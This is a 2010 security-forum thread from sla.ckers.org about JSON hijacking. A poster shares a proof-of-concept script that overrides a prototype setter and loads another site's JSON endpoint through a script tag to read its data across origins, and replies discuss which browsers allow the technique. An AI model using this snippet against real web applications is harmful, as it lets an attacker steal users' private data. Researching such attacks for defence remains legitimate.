Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
JSON help
Posted by: zatoichi
Date: May 17, 2010 12:40AM

Hi,

A web application is sending data in this format:

{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}

and i am using this code to get the JSON from my web site:

<script>
Object.prototype.__defineSetter__("t",function(obj){alert(1);for(var i in obj) {alert(i + '=' + obj);} });
</script>
<script defer="defer" src="http://XXX.XXX.XXX.X/main"/> // this points to the json
</script>

Is there anything wrong with the code or the format of JSON? I am using the following browsers to write the POC,

1. Firefox 3.6.3
2. IE 7.0.5730.13

Does these browsers allow setters/getters, please suggest a browser for running the PoC.

Options: ReplyQuote
Re: JSON help
Posted by: Gareth Heyes
Date: May 17, 2010 07:22AM

IE doesn't have __defineSetter__ support, FF3 disabled define setter on the object prototype. Try it in Google Chrome it should work

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSON help
Posted by: zatoichi
Date: May 18, 2010 02:01AM

@gareth hayes: thanks for the tip.

i am not able to capture this kind of json:

Format 1 ::::

{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}

but if i convert it to:

Format 2::::

[{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}]

i am able to capture the event in setter function.

is there any way to capture the event when json is in previous format (Format 1).

Options: ReplyQuote


Sorry, only registered users may post in this forum.